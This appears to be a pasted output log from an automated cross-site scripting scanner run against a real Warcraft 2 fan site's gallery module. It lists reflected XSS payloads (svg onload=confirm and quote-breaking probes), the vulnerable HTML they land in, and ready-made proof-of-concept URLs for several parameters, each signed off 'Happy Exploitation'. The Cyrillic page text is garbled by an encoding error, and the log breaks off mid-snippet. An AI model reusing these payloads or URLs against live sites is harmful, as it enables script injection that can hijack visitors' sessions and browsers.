Untitled

a guest
Nov 17th, 2017
  1. [!] Please wait ....
  2. [*] Payload Found . . .
  3. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  4. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3'>zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3'>zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td 
align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5900</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  5. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  6. [*] Happy Exploitation :D
  7. [*] Payload Found . . .
  8. [*] Payload: %78%22%78%3e%78
  9. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3x"x>x&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3x"x>x&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a 
href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5901</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  10. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%78%22%78%3e%78&min=0&orderby=titreA&show=
  11. [*] Happy Exploitation :D
  12. [*] Payload Found . . .
  13. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  14. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3">zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3">zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td 
align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5902</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  15. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  16. [*] Happy Exploitation :D
  17. [*] Payload Found . . .
  18. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  19. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'>&nbsp;</td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3zigoo0<svg/onload=confirm(/zigoo0/)>web&min=0&orderby=titreA&show=12'"></td><td align='center' width='33%'>&nbsp;</td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3zigoo0<svg/onload=confirm(/zigoo0/)>web&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td 
align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5903</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  20. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&min=0&orderby=titreA&show=
  21. [*] Happy Exploitation :D
  22. [*] Payload Found . . .
  23. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  24. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0'>zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' 
align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5904</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  25. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  26. [*] Happy Exploitation :D
  27. [*] Payload Found . . .
  28. [*] Payload: %78%22%78%3e%78
  29. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0x"x>x&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0x"x>x&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0x"x>x&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td 
width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5905</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  30. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%78%22%78%3e%78&orderby=titreA&show=
  31. [*] Happy Exploitation :D
  32. [*] Payload Found . . .
  33. [*] Payload: %22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  34. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0">zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' 
align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5906</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  35. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0%22%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  36. [*] Happy Exploitation :D
  37. [*] Payload Found . . .
  38. [*] Payload: zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  39. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0zigoo0<svg/onload=confirm(/zigoo0/)>web&orderby=titreA&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table 
width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5907</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  40. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0zigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&orderby=titreA&show=
  41. [*] Happy Exploitation :D
  42. [*] Payload Found . . .
  43. [*] Payload: %27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb
  44. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreA'>zigoo0<svg/onload=confirm(/zigoo0/)>web&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' 
cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td width='35%' align='right'><b>������:</b></td><td>800 x 600</td></tr><tr><td align='right'><b>�������� :</b></td><td></td></tr><tr><td align='right'><b>���������:</b></td><td>���� - 10 ��� ������</td></tr><tr><td align='right'>&nbsp;</td><td><a href="javascript:openWithSelfMain('show-pop.php?id=http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg&img=potrax.jpg','popup','820','605')"><img src='images/print.gif' alt='�������� ���� �������, ����� ����������'></a></td></tr><tr><td align='right'>���������</td><td><a href='carte.php?id=21'><img src='images/friend.gif' alt='���������'></a></td></tr><tr><td align='right'><b>������:</b></td><td>5908</td></tr><tr><td align='right'><b>������:</b></td><td>0.00&nbsp;&nbsp;( 0 ����� )</td></tr></table></td></tr></table><br><center>_NW_EDITNOREGUSER</center><br></td></tr></table></td></tr></table></td></tr></table>
  45. [*] POC: http://www.war2.ru/modules/bamagalerie3/viewcat.php?id=21&cid=3&min=0&orderby=titreA%27%3Ezigoo0%3Csvg%2Fonload%3Dconfirm%28%2Fzigoo0%2F%29%3Eweb&show=
  46. [*] Happy Exploitation :D
  47. [*] Payload Found . . .
  48. [*] Payload: %78%22%78%3e%78
  49. [!] Code Snippet: <p><br><div align='center'><h5>������� �����������warcraft 2 ������� ��������� ������� ������, warcraft 2 ������</h5></div></p><table width='100%' cellspacing='0' cellpadding='0' border='0'><tr><td align='center'><table width='100%' cellspacing='1' cellpadding='2' border='0' class='bg3'><tr><td align='left' bgcolor='#D9E2ED'><b><a href='index.php'>������� �����</a>&nbsp;:&nbsp;<a href='viewcat.php?&cid=3'>���� - 10 ��� ������</a>&nbsp;:&nbsp;</b></td></tr></table><br><form method=post action=index.php><table width='100%' border='0' cellspacing='0'><tr><td align='center' width='33%'><input type='button' class='button' value=' << ' onClick="location='viewcat.php?id=20&cid=3&min=0&orderby=titreAx"x>x&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value='������� �����' onClick="location='viewcat.php?cid=3&min=0&orderby=titreAx"x>x&show=12'"></td><td align='center' width='33%'><input type='button' class='button' value=' >> ' onClick="location='viewcat.php?id=22&cid=3&min=0&orderby=titreAx"x>x&show=12'"></td></table></form><center><table border='0' cellspacing='0' cellpadding='0' bordercolor='#993300' bgcolor='#6699FF'><tr><td><table border='0' cellspacing='0' cellpadding='3' bordercolor='#FFFFFF' bgcolor='#F5F5F5'><tr><td><table border='0' cellspacing='0' cellpadding='0'><tr><td><img src='http://www.war2.ru/modules/bamagalerie3/galerie/potrax.jpg' border='0' width='800' height='600'></td></tr></table></td></tr></table></td></tr></table></center><br><table width='80%' border='0' cellspacing='0' cellpadding='2' align='center' class='bg2'><tr><td bgcolor='#D9E2ED' align='center'><a href='rateimg.php?id=21&image=./img_Dat->galerie/potrax.jpg&cid=3&min=&orderby=titreAx"x>x&show=12'>������� ��� �����������?</a></td></tr></table><br><table width='80%' border='0' cellspacing='0' cellpadding='0' align='center'><tr><td><table width='100%' border='0' cellspacing='1' cellpadding='2' align='center' bgcolor='#D9E2ED'><tr><td 
